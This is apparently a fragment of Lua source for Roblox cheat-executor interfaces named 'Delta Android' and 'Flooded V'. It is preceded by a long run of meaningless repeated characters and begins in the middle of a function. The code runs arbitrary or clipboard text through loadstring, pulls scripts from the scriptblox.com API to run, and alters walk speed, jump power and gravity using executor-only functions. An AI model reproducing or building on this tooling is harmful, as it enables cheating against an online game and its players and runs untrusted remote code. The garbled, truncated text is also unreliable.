aaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa end) loadtext.MouseButton1Click:Connect(function() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Work In Progress / Coming Soon"; Duration = 5; }) end) end local http = game:GetService("HttpService") btn.MouseButton1Click:Connect(function() for _, child in ipairs(G2L["d2"]:GetChildren()) do if child:IsA("Frame") then child:Destroy() end end local url = "https://scriptblox.com/api/script/search?filters=free&q="..G2L["ce"].Text local response = game:HttpGetAsync(url) local decoded = http:JSONDecode(response) for _, script in pairs(decoded.result.scripts) do if(script.isUniversal == true) then AddTab("rbxassetid://12742166887", "??", script.title, script.script) else AddTab("https://assetgame.roblox.com/Game/Tools/ThumbnailAsset.ashx?aid="..script.game.gameId.."&fmt=png&wd=420&ht=420", "??", script.title, script.script) end end end) end; task.spawn(C_fd); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.Set.LocalScript local function C_10a() local script = G2L["10a"]; local btn = script.Parent local textbox = script.Parent.Parent.TextBox btn.MouseButton1Click:Connect(function() game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = tonumber(textbox.Text) end) end; task.spawn(C_10a); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.LocalScript local function C_110() local script = G2L["110"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() setclipboard("discord.gg/deltaex") game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Copied the discord invite to you clipboard"; Duration = 5; }) end) end; task.spawn(C_110); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.LocalScript local function C_115() local script = G2L["115"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Made by ShowerheadFD & Lxnny/DeltaTeam"; Duration = 5; }) end) end; task.spawn(C_115); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.LocalScript local function C_11b() local script = G2L["11b"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() setfpscap(0) end) end; task.spawn(C_11b); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.Set.LocalScript local function C_123() local script = G2L["123"]; local btn = script.Parent local textbox = script.Parent.Parent.TextBox btn.MouseButton1Click:Connect(function() game.Players.LocalPlayer.Character.Humanoid.JumpPower = tonumber(textbox.Text) end) end; task.spawn(C_123); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Set.LocalScript local function C_12c() local script = G2L["12c"]; local btn = script.Parent local textbox = script.Parent.Parent.TextBox btn.MouseButton1Click:Connect(function() workspace.Gravity = tonumber(textbox.Text) end) end; task.spawn(C_12c); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Reset.LocalScript local function C_130() local script = G2L["130"]; local btn = script.Parent local textbox = script.Parent.Parent.TextBox btn.MouseButton1Click:Connect(function() workspace.Gravity = 196.2 end) end; task.spawn(C_130); -- StarterGui.DeltaGui.MainUi.MainFrame.DraggableStuff local function C_132() local script = G2L["132"]; script.Parent.Draggable = true end; task.spawn(C_132); -- StarterGui.DeltaGui.FloatingIcon.LocalScript local function C_135() local script = G2L["135"]; script.Parent.Draggable = true script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.MainUi.MainFrame.Visible = true script.Parent.Visible = false end) end; task.spawn(C_135); load_saved_scripts() if isfile("theme.delta") then local HttpService = game:GetService("HttpService") local json = readfile("theme.delta") local data = HttpService:JSONDecode(json) local BgColor = Color3.fromHex(data.BgColor) local BtnColor = Color3.fromHex(data.BtnColor) local MenuColor = Color3.fromHex(data.MenuColor) local SettingBtnColor = Color3.fromHex(data.SettingInputColor) local gui = gethui().DeltaGui local BG = gui.MainUi.MainFrame BG.BackgroundColor3 = BgColor gui.FloatingIcon.BackgroundColor3 = BgColor -- Menus -- Script List gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.TitleScript.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.BackgroundColor3 = MenuColor --Executor Home gethui().DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.BackgroundColor3 = MenuColor --Script Search gethui().DeltaGui.MainUi.MainFrame.Tabs.Scripts.TitleScript.BackgroundColor3 = MenuColor --Settings gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.BackgroundColor3 = MenuColor task.spawn(function() gethui().DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.BackgroundColor3 = MenuColor gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.LIST.TitleScript.BackgroundColor3 = MenuColor for _, script in pairs(gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.Scripts.ScriptFrame:GetChildren()) do if script.Name == "LIST" then script.TitleScript.BackgroundColor3 = MenuColor end end for _, script in pairs(gethui().DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.ScriptFrame:GetChildren()) do if script:IsA("Frame") then script.BackgroundColor3 = MenuColor end end end) -- Buttons task.spawn(function() for _, inside in pairs(gethui().DeltaGui.MainUi.MainFrame.Tabs:GetDescendants()) do if inside:IsA("Frame") and inside:FindFirstChild("ImageLabel") and inside:FindFirstChild("TextButton") then inside.BackgroundColor3 = BtnColor inside.ImageLabel.BackgroundColor3 = BtnColor inside.TextButton.BackgroundColor3 = BtnColor end end -- Setting btns gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Reset.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Set.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.TextBox.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.Set.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.TextBox.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.Set.BackgroundColor3 = SettingBtnColor gethui().DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.TextBox.BackgroundColor3 = SettingBtnColor end) if(data.editor_image ~= "") then local ImageFile = "delta_theme_image" local ImageTransparency = data.image_opacity gethui().DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.Editor.Image = getcustomasset(ImageFile) gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.Editor.Image = getcustomasset(ImageFile) gethui().DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.Editor.ImageTransparency = ImageTransparency gethui().DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.Editor.ImageTransparency = ImageTransparency end end return G2L["1"], require; end) Section:NewButton("Flooded V", "flooded", function() -- Gui to Lua -- Version: 3.2 -- Instances: local Flooded = Instance.new("ScreenGui") local MainFrame = Instance.new("Frame") local UICorner = Instance.new("UICorner") local BAR = Instance.new("Frame") local UICorner_2 = Instance.new("UICorner") local Home = Instance.new("ImageButton") local ScriptHub = Instance.new("ImageButton") local Console = Instance.new("ImageButton") local Executer = Instance.new("Frame") local ScriptInput = Instance.new("TextBox") local TextButton = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local TextButton_2 = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") local TextButton_3 = Instance.new("TextButton") local UICorner_5 = Instance.new("UICorner") local ScriptHubFrame = Instance.new("Frame") local Console_2 = Instance.new("Frame") local ScrollingFrame = Instance.new("ScrollingFrame") local title = Instance.new("TextLabel") local UICorner_6 = Instance.new("UICorner") local topbar = Instance.new("Frame") local UICorner_7 = Instance.new("UICorner") local TextLabel = Instance.new("TextLabel") local Settings = Instance.new("ImageButton") local UICorner_8 = Instance.new("UICorner") local TextButton_4 = Instance.new("TextButton") local UICorner_9 = Instance.new("UICorner") local Seetings = Instance.new("Frame") local Speed = Instance.new("TextLabel") local speedCon = Instance.new("TextBox") local UICorner_10 = Instance.new("UICorner") local speedset = Instance.new("TextButton") local UICorner_11 = Instance.new("UICorner") local JumpCon = Instance.new("TextBox") local UICorner_12 = Instance.new("UICorner") local Jump = Instance.new("TextLabel") local JumpSet = Instance.new("TextButton") local UICorner_13 = Instance.new("UICorner") local TextButton_5 = Instance.new("TextButton") local UICorner_14 = Instance.new("UICorner") local TextButton_6 = Instance.new("TextButton") local UICorner_15 = Instance.new("UICorner") local ImageButton = Instance.new("ImageButton") local UICorner_16 = Instance.new("UICorner") local TextButton_7 = Instance.new("TextButton") local Search = Instance.new("ImageButton") local SearchFrame = Instance.new("Frame") --Properties: Flooded.ResetOnSpawn = false Flooded.Name = "Flooded" Flooded.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Flooded.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Flooded.ResetOnSpawn = false Flooded.Parent = gethui() MainFrame.Name = "MainFrame" MainFrame.Parent = Flooded MainFrame.BackgroundColor3 = Color3.fromRGB(64, 148, 161) MainFrame.BorderColor3 = Color3.fromRGB(255, 255, 255) MainFrame.Position = UDim2.new(0.15633297, -44, 0.0564282313, -27) MainFrame.Size = UDim2.new(0.818025708, 0, 1, 0) UICorner.CornerRadius = UDim.new(0, 23) UICorner.Parent = MainFrame BAR.Name = "BAR" BAR.Parent = MainFrame BAR.BackgroundColor3 = Color3.fromRGB(255, 255, 255) BAR.Position = UDim2.new(0.0367774256, 0, 0.162784129, 0) BAR.Size = UDim2.new(0, 79, 0, 193) UICorner_2.CornerRadius = UDim.new(0, 10) UICorner_2.Parent = BAR Home.Name = "Home" Home.Parent = BAR Home.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Home.Position = UDim2.new(0.189873412, 0, 0.0714285746, 0) Home.Size = UDim2.new(0.607594907, 0, 0.194444448, 0) Home.Image = "rbxassetid://11263246584" ScriptHub.Name = "ScriptHub" ScriptHub.Parent = BAR ScriptHub.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScriptHub.Position = UDim2.new(0.189873368, 0, 0.376984119, 0) ScriptHub.Size = UDim2.new(0.607594907, 0, 0.214285716, 0) ScriptHub.Image = "rbxassetid://11570626761" Console.Name = "Console" Console.Parent = BAR Console.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Console.Position = UDim2.new(0.189873368, 0, 0.674376965, 0) Console.Size = UDim2.new(0.607594907, 0, 0.214285716, 0) Console.Image = "rbxassetid://7128117167" Console.ImageColor3 = Color3.fromRGB(0, 0, 0) Executer.Name = "Executer" Executer.Parent = MainFrame Executer.BackgroundColor3 = Color3.fromRGB(64, 148, 161) Executer.BorderColor3 = Color3.fromRGB(64, 148, 161) Executer.Position = UDim2.new(0.215481207, 0, 0.138157919, 0) Executer.Visible = true Executer.Size = UDim2.new(0.723849356, 0, 0.809210539, 0) ScriptInput.Name = "ScriptInput" ScriptInput.Parent = Executer ScriptInput.BackgroundColor3 = Color3.fromRGB(24, 50, 99) ScriptInput.BorderColor3 = Color3.fromRGB(255, 255, 255) ScriptInput.Position = UDim2.new(0.0578034669, 0, 0.0569105372, 0) ScriptInput.Size = UDim2.new(0.910404623, 0, 0.66260165, 0) ScriptInput.Font = Enum.Font.SourceSans ScriptInput.Text = "--Fixed By Nath.#4468" ScriptInput.TextColor3 = Color3.fromRGB(255, 255, 255) ScriptInput.TextSize = 16.000 ScriptInput.TextWrapped = true ScriptInput.ClearTextOnFocus = false ScriptInput.TextXAlignment = Enum.TextXAlignment.Left ScriptInput.TextYAlignment = Enum.TextYAlignment.Top TextButton.Parent = Executer TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton.Position = UDim2.new(0.0578034669, 0, 0.796747983, 0) TextButton.Size = UDim2.new(0.28323698, 0, 0.166666672, 0) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "Execute Text" TextButton.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton.TextSize = 14.000 local function ExecuteScript(script) local f, err = loadstring(script) if f then f() game.StarterGui:SetCore("SendNotification", { Title = "Flooded Android", Text = "Script Executed", Duration = 3 }) else print("Script execution error:", err) game.StarterGui:SetCore("SendNotification", { Title = "Flooded Android", Text = "Script Error", Duration = 3 }) end end -- Connect the execute button to the script execution function TextButton.MouseButton1Click:Connect(function() local script = ScriptInput.Text ExecuteScript(script) end) UICorner_3.CornerRadius = UDim.new(0, 13) UICorner_3.Parent = TextButton TextButton_2.Parent = Executer TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_2.Position = UDim2.new(0.369942188, 0, 0.796747983, 0) TextButton_2.Size = UDim2.new(0.28323698, 0, 0.166666672, 0) TextButton_2.Font = Enum.Font.SourceSans TextButton_2.Text = "Clear" TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_2.TextSize = 14.000 TextButton_2.MouseButton1Click:Connect(function() ScriptInput.Text = "" end) UICorner_4.CornerRadius = UDim.new(0, 13) UICorner_4.Parent = TextButton_2 TextButton_3.Parent = Executer TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_3.Position = UDim2.new(0.684971094, 0, 0.796747983, 0) TextButton_3.Size = UDim2.new(0.28323698, 0, 0.166666672, 0) TextButton_3.Font = Enum.Font.SourceSans TextButton_3.Text = "Execute ClipBoard" TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_3.TextSize = 14.000 TextButton_3.MouseButton1Click:Connect(function() loadstring(getclipboard())() game.StarterGui:SetCore("SendNotification", { Title = "Flooded Android"; Text = "Script Executed From Clipboard"; Duration = 3; }) end) UICorner_5.CornerRadius = UDim.new(0, 13) UICorner_5.Parent = TextButton_3 ScriptHubFrame.Name = "ScriptHubFrame" ScriptHubFrame.Parent = MainFrame ScriptHubFrame.BackgroundColor3 = Color3.fromRGB(64, 148, 161) ScriptHubFrame.BorderColor3 = Color3.fromRGB(64, 148, 161) ScriptHubFrame.Position = UDim2.new(0.223849416, 0, 0.15789476, 0) ScriptHubFrame.Visible = false ScriptHubFrame.Size = UDim2.new(0.723849356, 0, 0.809210539, 0) -- Create the scrolling frame for the script list local scriptList = Instance.new("ScrollingFrame") scriptList.Name = "ScriptList" scriptList.Position = UDim2.new(0, 10, 0, 10) scriptList.Size = UDim2.new(1, -20, 1.2, -80) scriptList.BackgroundTransparency = 0.8 scriptList.BackgroundColor3 = Color3.new(0, 0, 0) scriptList.CanvasSize = UDim2.new(0, 0, 0, 0) scriptList.ScrollBarThickness = 10 scriptList.Parent = ScriptHubFrame -- Create the script input textbox local scriptInput = Instance.new("TextBox") scriptInput.Name = "ScriptInput" scriptInput.Size = UDim2.new(0.699999988, -10, 0, 30) scriptInput.Position = UDim2.new(0, 10, 1.20000005, -40) scriptInput.AnchorPoint = Vector2.new(0, 1) scriptInput.BackgroundColor3 = Color3.new(255, 255, 255) scriptInput.TextColor3 = Color3.new(0, 0, 0) scriptInput.Font = Enum.Font.SourceSans scriptInput.TextSize = 16 scriptInput.TextWrapped = true scriptInput.Text = "" scriptInput.PlaceholderText = "Enter script code..." scriptInput.ClearTextOnFocus = false scriptInput.Parent = ScriptHubFrame -- Create the add script button local addButton = Instance.new("TextButton") addButton.Name = "AddButton" addButton.Size = UDim2.new(0, 100, 0, 30) addButton.Position = UDim2.new(1, 10, 1.03, 0) addButton.AnchorPoint = Vector2.new(1, 1) addButton.BackgroundColor3 = Color3.new(255, 255, 255) addButton.TextColor3 = Color3.new(0, 0, 0) addButton.Font = Enum.Font.SourceSansBold addButton.TextSize = 16 addButton.Text = "Add Script" addButton.Parent = ScriptHubFrame -- Function to add a script to the script hub local function addScript(title, scriptCode) local scriptFrame = Instance.new("Frame") scriptFrame.Name = "ScriptFrame" scriptFrame.Size = UDim2.new(1, -20, 0, 60) scriptFrame.Position = UDim2.new(0, 10, 0, #scriptList:GetChildren() * 70) scriptFrame.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2) scriptFrame.Parent = scriptList local scriptButton = Instance.new("TextButton") scriptButton.Name = "ScriptButton" scriptButton.Size = UDim2.new(1, 0, 1, 0) scriptButton.BackgroundTransparency = 1 scriptButton.BackgroundColor3 = Color3.new(255, 255, 255) scriptButton.Text = title scriptButton.Font = Enum.Font.SourceSans scriptButton.TextSize = 50 scriptButton.TextColor3 = Color3.new(0, 0, 0) scriptButton.TextWrapped = true scriptButton.Parent = scriptFrame scriptButton.MouseButton1Click:Connect(function() -- Execute the scriptCode when the button is clicked local success, err = pcall(function() loadstring(scriptCode)() end) if not success then warn("Error executing script:", err) end end) local deleteButton = Instance.new("TextButton") deleteButton.Name = "DeleteButton" deleteButton.Size = UDim2.new(0, 80, 0, 50) deleteButton.Position = UDim2.new(1, 0, 0.5, 0) deleteButton.AnchorPoint = Vector2.new(1, 0.5) deleteButton.BackgroundColor3 = Color3.new(0.8, 0, 0) deleteButton.TextColor3 = Color3.new(1, 1, 1) deleteButton.Font = Enum.Font.SourceSansBold deleteButton.TextSize = 16 deleteButton.Text = "X" deleteButton.Parent = scriptButton deleteButton.MouseButton1Click:Connect(function() -- Remove the script from the script hub scriptFrame:Destroy() end) scriptList.CanvasSize = UDim2.new(0, 0, 0, #scriptList:GetChildren() * 70) end addButton.MouseButton1Click:Connect(function() local scriptTitle = "Untitled" local scriptCode = scriptInput.Text if scriptCode ~= "" then local titlePrompt = Instance.new("TextBox") titlePrompt.Name = "TitlePrompt" titlePrompt.Size = UDim2.new(0, 200, 0, 30) titlePrompt.Position = UDim2.new(0.5, -100, 0.5, -15) titlePrompt.AnchorPoint = Vector2.new(0.5, 0.5) titlePrompt.BackgroundColor3 = Color3.new(0.5, 0.5, 0.5) titlePrompt.TextColor3 = Color3.new(1, 1, 1) titlePrompt.Font = Enum.Font.SourceSans titlePrompt.TextSize = 16 titlePrompt.PlaceholderText = "Title" titlePrompt.Text = "" titlePrompt.Parent = ScriptHubFrame local function handlePromptSubmit() scriptTitle = titlePrompt.Text titlePrompt:Destroy() addScript(scriptTitle, scriptCode) end titlePrompt.FocusLost:Connect(handlePromptSubmit) end end) Console_2.Name = "Console" Console_2.Parent = MainFrame Console_2.BackgroundColor3 = Color3.fromRGB(64, 148, 161) Console_2.BorderColor3 = Color3.fromRGB(64, 148, 161) Console_2.Position = UDim2.new(0.224282146, 0, 0.183154821, 0) Console_2.Visible = false Console_2.Size = UDim2.new(0.723849356, 0, 0.809210539, 0) -- Create the ScrollingFrame local ScrollingFrame = Instance.new("ScrollingFrame") ScrollingFrame.Name = "ScrollingFrame" ScrollingFrame.Parent = Console_2 ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(64, 148, 161) ScrollingFrame.Position = UDim2.new(0.0766660869, 0, 0.0338661745, 0) ScrollingFrame.Size = UDim2.new(0, 352, 0, 205) ScrollingFrame.VerticalScrollBarPosition = Enum.VerticalScrollBarPosition.Left ScrollingFrame.HorizontalScrollBarInset = Enum.ScrollBarInset.Always ScrollingFrame.ScrollBarThickness = 10 -- Create the inner Frame for content and scrolling local Frame = Instance.new("Frame") Frame.BackgroundTransparency = 1 Frame.Size = UDim2.new(1, -10, 1, 0) -- Subtract 10 pixels for the width of the scroll bar Frame.Position = UDim2.new(0, 0, 0, 0) Frame.Parent = ScrollingFrame -- Create a UIListLayout to handle scrolling and layout of the text labels local UIListLayout = Instance.new("UIListLayout") UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout.Parent = Frame -- Function to add new lines of text to the ScrollingFrame local function AddTextLine(text) local TextLabel = Instance.new("TextLabel") TextLabel.Size = UDim2.new(1, 0, 0, 20) TextLabel.BackgroundTransparency = 1 TextLabel.Text = text TextLabel.TextWrapped = true TextLabel.TextXAlignment = Enum.TextXAlignment.Left TextLabel.TextYAlignment = Enum.TextYAlignment.Top TextLabel.TextSize = 14 TextLabel.TextColor3 = Color3.new(0, 0, 0) -- Set text color to black TextLabel.Parent = Frame -- Update the ScrollingFrame's CanvasSize ScrollingFrame.CanvasSize = UDim2.new(0, UIListLayout.AbsoluteContentSize.X, 0, UIListLayout.AbsoluteContentSize.Y) end -- Redirect console output to the ScrollingFrame local function ConsoleOutput(message, messageType) if messageType == Enum.MessageType.MessageOutput then local time = os.date("%H:%M:%S") -- Get the current time AddTextLine("[" .. time .. "] " .. message) -- Add time prefix to the message end end game:GetService("LogService").MessageOut:Connect(ConsoleOutput) title.Name = "title" title.Parent = MainFrame title.BackgroundColor3 = Color3.fromRGB(64, 148, 161) title.BorderColor3 = Color3.fromRGB(64, 148, 161) title.Position = UDim2.new(0.0145368073, 0, 0.0427631587, 0) title.Size = UDim2.new(0.301255226, 0, 0.0756578967, 0) title.Font = Enum.Font.SourceSans title.Text = "Flooded V" title.TextColor3 = Color3.fromRGB(255, 255, 255) title.TextSize = 40.000 title.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) UICorner_6.CornerRadius = UDim.new(0, 23) UICorner_6.Parent = title topbar.Name = "top bar" topbar.Parent = MainFrame topbar.BackgroundColor3 = Color3.fromRGB(255, 255, 255) topbar.Position = UDim2.new(0.324267775, 0, 0.032894738, 0) topbar.Size = UDim2.new(0.64853555, 0, 0.125, 0) UICorner_7.CornerRadius = UDim.new(0, 23) UICorner_7.Parent = topbar TextLabel.Parent = topbar TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BorderColor3 = Color3.fromRGB(255, 255, 255) TextLabel.Position = UDim2.new(0.0419354253, 0, 0.131578937, 0) TextLabel.Size = UDim2.new(0, 94, 0, 22) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Version: BetaV2" TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel.TextSize = 14.000 Settings.Name = "Settings" Settings.Parent = topbar Settings.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Settings.Position = UDim2.new(0.699999988, 0, 0.0789473802, 0) Settings.Size = UDim2.new(0.106451616, 0, 0.815789461, 0) Settings.Image = "rbxassetid://7059346373" Settings.ImageColor3 = Color3.fromRGB(0, 0, 0) UICorner_8.CornerRadius = UDim.new(0, 100) UICorner_8.Parent = Settings TextButton_4.Parent = topbar TextButton_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_4.Position = UDim2.new(0.870967746, 0, 0.0789473653, 0) TextButton_4.Size = UDim2.new(0.0903225839, 0, 0.736842096, 0) TextButton_4.Font = Enum.Font.SourceSans TextButton_4.Text = "X" TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_4.TextSize = 50.000 UICorner_9.CornerRadius = UDim.new(0, 100) UICorner_9.Parent = TextButton_4 Seetings.Name = "Seetings" Seetings.Parent = MainFrame Seetings.BackgroundColor3 = Color3.fromRGB(64, 148, 161) Seetings.BorderColor3 = Color3.fromRGB(64, 148, 161) Seetings.Position = UDim2.new(0.191640079, 0, 0.161003232, 0) Seetings.Visible = false Seetings.Size = UDim2.new(0.791705072, 0, 0.809210539, 0) Speed.Name = "Speed" Speed.Parent = Seetings Speed.BackgroundColor3 = Color3.fromRGB(64, 148, 161) Speed.BorderColor3 = Color3.fromRGB(64, 148, 161) Speed.Position = UDim2.new(0.0107135521, 0, 0, 0) Speed.Size = UDim2.new(0, 200, 0, 50) Speed.Font = Enum.Font.SourceSans Speed.Text = "Speed" Speed.TextColor3 = Color3.fromRGB(255, 255, 255) Speed.TextSize = 50.000 Speed.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) 